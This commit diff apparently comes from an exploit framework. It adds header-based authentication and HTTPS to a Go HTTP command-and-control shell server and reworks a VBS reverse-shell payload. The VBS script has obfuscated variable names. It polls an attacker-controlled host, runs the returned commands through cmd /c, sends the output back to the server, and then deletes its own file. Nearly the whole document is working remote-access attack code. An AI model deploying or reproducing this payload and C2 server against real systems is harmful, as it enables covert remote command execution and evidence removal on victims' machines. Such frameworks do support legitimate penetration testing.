Added auth header, https, and improved shell stability

Author: lobsterjerusalem

c2/httpshellserver/httpshellserver.go

@@ -14,6 +14,7 @@ import (
 
 	"github.com/vulncheck-oss/go-exploit/c2/channel"
 	"github.com/vulncheck-oss/go-exploit/encryption"
+	"github.com/vulncheck-oss/go-exploit/random"
 	"github.com/vulncheck-oss/go-exploit/output"
 )
 
@@ -41,6 +42,9 @@ type Server struct {
 	Certificate tls.Certificate
 	// Allows us to track if a connection has been received during the life of the server
 	Success bool
+	// Randomly generated during init, gives some sense of security where there is otherwise none.
+	// This should appear in a header with the name VC-Auth
+	AuthHeader string
 }
 
 // A basic singleton interface for the c2.
@@ -53,6 +57,7 @@ func GetInstance() *Server {
 }
 
 func (httpServer *Server) Init(channel channel.Channel) bool {
+	httpServer.AuthHeader = random.RandLetters(20)
 	if channel.IsClient {
 		output.PrintFrameworkError("Called C2HTTPServer as a client. Use lhost and lport.")
 
@@ -100,17 +105,30 @@ func (httpServer *Server) CreateFlags() {
 }
 
 // start the HTTP server and listen for incoming requests for `httpServer.FileName`.
-//
 //nolint:gocognit
 func (httpServer *Server) Run(timeout int) {
-	http.HandleFunc("/rx", func(_ http.ResponseWriter, req *http.Request) {
+	http.HandleFunc("/rx", func(writer http.ResponseWriter, req *http.Request) {
+		authHeader := req.Header.Get("VC-Auth")
+		if authHeader != httpServer.AuthHeader {
+			writer.WriteHeader(http.StatusForbidden)
+			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, req.Header.Get("VC-Auth"), httpServer.AuthHeader)
+			
+			return
+		}
 		body, _ := io.ReadAll(req.Body)
 		if strings.TrimSpace(string(body)) != "" {
 			fmt.Printf("\n%s: %s\n", req.RemoteAddr, string(body))
 		}
 	})
 
 	http.HandleFunc("/", func(writer http.ResponseWriter, req *http.Request) {
+		authHeader := req.Header.Get("VC-Auth")
+		if authHeader != httpServer.AuthHeader {
+			writer.WriteHeader(http.StatusForbidden)
+			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, req.Header.Get("VC-Auth"), httpServer.AuthHeader)
+			
+			return
+		}
 		lastSeen = time.Now()
 		writer.Header().Set("Server", httpServer.ServerField)
 
@@ -166,11 +184,11 @@ func (httpServer *Server) Run(timeout int) {
 				//nolint
 				MinVersion: tls.VersionSSL30,
 			}
-			server := http.Server{
+			server := http.Server {
 				Addr:      connectionString,
 				TLSConfig: tlsConfig,
 				// required to disable HTTP/2 according to https://pkg.go.dev/net/http#hdr-HTTP_2
-				TLSNextProto: make(map[string]func(*http.Server, *tls.Conn, http.Handler), 1),
+				TLSNextProto: make(map[string]func(*http.Server, *tls.Conn, http.Handler),1),
 			}
 			defer server.Close()
 			_ = server.ListenAndServeTLS("", "")

payload/reverse/vbs.go

@@ -12,10 +12,10 @@ var (
 
 // Generates a script that can be used to create a reverse shell via vbs (can be run with cscript)
 // original source: https://raw.githubusercontent.com/cym13/vbs-reverse-shell/refs/heads/master/reverse_shell.vbs
-func (vbs *VBSHTTPPayload) Default(lhost string, lport int, ssl bool) string {
+func (vbs *VBSHTTPPayload) Default(lhost string, lport int, ssl bool, authHeader string) string {
 	if ssl {
-		return fmt.Sprintf(VBSShell, "https", lhost, lport)
+		return fmt.Sprintf(VBSShell, "https", lhost, lport, authHeader)
 	}
 
-	return fmt.Sprintf(VBSShell, "http", lhost, lport)
+	return fmt.Sprintf(VBSShell, "http", lhost, lport, authHeader)
 }

payload/reverse/vbs/.reverse_http.vbs.swp

@@ -1,34 +1,51 @@
 Option Explicit
-On Error Resume Next
 
 CONST lkasjfo = "%s://%s:%d/"
+CONST fowihe = "%s"
 
-Dim xmlHttpReq, shell, execObj, alfkj, break, result
+Dim xmlHttpReq, shell, execObj, alfkj, break, result, fa
 
 Set shell = CreateObject("WScript.Shell")
 
 break = False
 While break <> True
 Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP")
-    xmlHttpReq.SetOption 2, xmlHttpReq.GetOption(2)
     xmlHttpReq.Open "GET", lkasjfo, false
+    xmlHttpReq.SetOption 2, xmlHttpReq.GetOption(2)
+    xmlHttpReq.setRequestHeader "VC-Auth", fowihe
     xmlHttpReq.Send
 
-    alfkj = "cmd    /c " & Trim(xmlHttpReq.responseText)
-
-    If InStr(alfkj, "exit") Then
-        break = True
+    If (xmlHttpReq.status <> 200) Then
+        fa = fa + 1
+        If fa > 5 Then
+            break = True
+        End If
     Else
-        Set execObj = shell.Exec(alfkj)
-
-        result = ""
-        Do Until execObj.StdOut.AtEndOfStream
-            result = result & execObj.StdOut.ReadAll()
-        Loop
+        fa = 0
+    End If
 
-        Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP")
-        xmlHttpReq.Open "POST", lkasjfo & "rx", false
-        xmlHttpReq.SetOption 2, xmlHttpReq.GetOption(2)
-        xmlHttpReq.Send(result)
+    If Trim(xmlHttpReq.responseText) <> "" Then
+        alfkj = "cmd    /c " & Trim(xmlHttpReq.responseText)
+
+        If InStr(alfkj, "exit") Then
+            break = True
+        Else
+            Set execObj = shell.Exec(alfkj)
+
+            result = ""
+            Do Until execObj.StdOut.AtEndOfStream
+                result = result & execObj.StdOut.ReadAll()
+            Loop
+
+            Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP")
+            xmlHttpReq.Open "POST", lkasjfo & "rx", false
+            xmlHttpReq.SetOption 2, xmlHttpReq.GetOption(2)
+            xmlHttpReq.setRequestHeader "VC-Auth", fowihe
+            xmlHttpReq.Send(result)
+        End If
     End If
 Wend
+
+Set objFSO = CreateObject("Scripting.FileSystemObject")
+strScript = Wscript.ScriptFullName
+objFSO.DeleteFile(strScript)